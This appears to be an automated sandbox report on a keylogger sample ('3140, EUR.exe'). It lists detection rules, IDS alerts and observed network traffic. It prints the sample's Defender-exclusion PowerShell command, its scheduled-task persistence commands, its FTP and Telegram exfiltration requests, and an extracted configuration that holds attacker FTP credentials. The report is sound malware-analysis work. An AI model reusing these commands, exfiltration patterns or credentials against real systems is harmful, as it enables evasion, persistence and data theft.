0.2.3140, EUR.exe.428dba0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x139041:$s1: UnHook 0x17ca61:$s1: UnHook 0x1c0281:$s1: UnHook 0x139048:$s2: SetHook 0x17ca68:$s2: SetHook 0x1c0288:$s2: SetHook 0x139050:$s3: CallNextHook 0x17ca70:$s3: CallNextHook 0x1c0290:$s3: CallNextHook 0x13905d:$s4: _hook 0x17ca7d:$s4: _hook 0x1c029d:$s4: _hook
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", ProcessId: 2124, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe, ParentImage: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe, ParentProcessId: 7276, ParentProcessName: lkuPOyvaWlIu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp", ProcessId: 7472, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", ProcessId: 6692, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", ProcessId: 2124, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", ProcessId: 6692, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:03:08.573740+0200	2803305	3	Unknown Traffic	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-30T15:03:11.053405+0200	2803305	3	Unknown Traffic	192.168.2.4	49739	188.114.97.3	443	TCP
2024-09-30T15:03:12.914997+0200	2803305	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP
2024-09-30T15:03:14.482581+0200	2803305	3	Unknown Traffic	192.168.2.4	49745	188.114.97.3	443	TCP
2024-09-30T15:03:17.150964+0200	2803305	3	Unknown Traffic	192.168.2.4	49752	188.114.97.3	443	TCP
2024-09-30T15:03:17.408082+0200	2803305	3	Unknown Traffic	192.168.2.4	49753	188.114.97.3	443	TCP
2024-09-30T15:03:25.987378+0200	2803305	3	Unknown Traffic	192.168.2.4	49763	188.114.97.3	443	TCP
2024-09-30T15:03:28.112386+0200	2803305	3	Unknown Traffic	192.168.2.4	49765	188.114.97.3	443	TCP
2024-09-30T15:03:28.824855+0200	2803305	3	Unknown Traffic	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-30T15:03:38.813708+0200	2803305	3	Unknown Traffic	192.168.2.4	49774	188.114.97.3	443	TCP
2024-09-30T15:03:40.638151+0200	2803305	3	Unknown Traffic	192.168.2.4	49776	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:03:06.041175+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.8.169	80	TCP
2024-09-30T15:03:08.055931+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.8.169	80	TCP
2024-09-30T15:03:10.479342+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.8.169	80	TCP
2024-09-30T15:03:13.352929+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	132.226.8.169	80	TCP
2024-09-30T15:03:16.259049+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	132.226.8.169	80	TCP
2024-09-30T15:03:20.196573+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49755	132.226.8.169	80	TCP
2024-09-30T15:03:24.274728+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49759	132.226.8.169	80	TCP

ETPRO MALWARE SnakeKeylogger Exfil via FTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:03:01.894291+0200	2845532	1	Malware Command and Control Activity Detected	192.168.2.4	49780	45.143.99.52	21	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.3140, EUR.exe.4397fe0.1.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "humble@quicklyserv.com", "Password": "omobolajijonze12345", "FTP Server": "ftp://quicklyserv.com/"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Virustotal: Detection: 43%			Perma Link

Multi AV Scanner detection for submitted file

Source: 3140, EUR.exe	ReversingLabs: Detection: 47%
Source: 3140, EUR.exe	Virustotal: Detection: 43%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 3140, EUR.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 3140, EUR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2

Source: 3140, EUR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source:	Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source:	Binary string: OqNV.pdb\|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 4x nop then jmp 02E1F475h	8_2_02E1F2D8
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 4x nop then jmp 02E1F475h	8_2_02E1F4C4
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 4x nop then jmp 02E1FC31h	8_2_02E1F979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 056EF475h	15_2_056EF4C4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 056EF475h	15_2_056EF2D8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 056EFC31h	15_2_056EF979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F20D0Dh	15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F21697h	15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F231E0h	15_2_06F22DC8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F22C19h	15_2_06F22968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2E959h	15_2_06F2E6B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_06F20673
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2E501h	15_2_06F2E258
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2E0A9h	15_2_06F2DE00
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2F661h	15_2_06F2F3B8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2F209h	15_2_06F2EF60
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2EDB1h	15_2_06F2EB08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2D3A1h	15_2_06F2D0F8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2CF49h	15_2_06F2CCA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_06F20853
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_06F20040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2FAB9h	15_2_06F2F810
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F231E0h	15_2_06F22DB8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2DC51h	15_2_06F2D9A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F2D7F9h	15_2_06F2D550
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 4x nop then jmp 06F231E0h	15_2_06F2310E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.4:49780 -> 45.143.99.52:21

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 45.143.99.52 ports 52160,54464,1,2,53879,21

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49779 -> 45.143.99.52:53879

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 45.143.99.52 45.143.99.52

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: EKSENBILISIMTR EKSENBILISIMTR
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443

Source: unknown

FTP traffic detected: 45.143.99.52:21 -> 192.168.2.4:49778 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
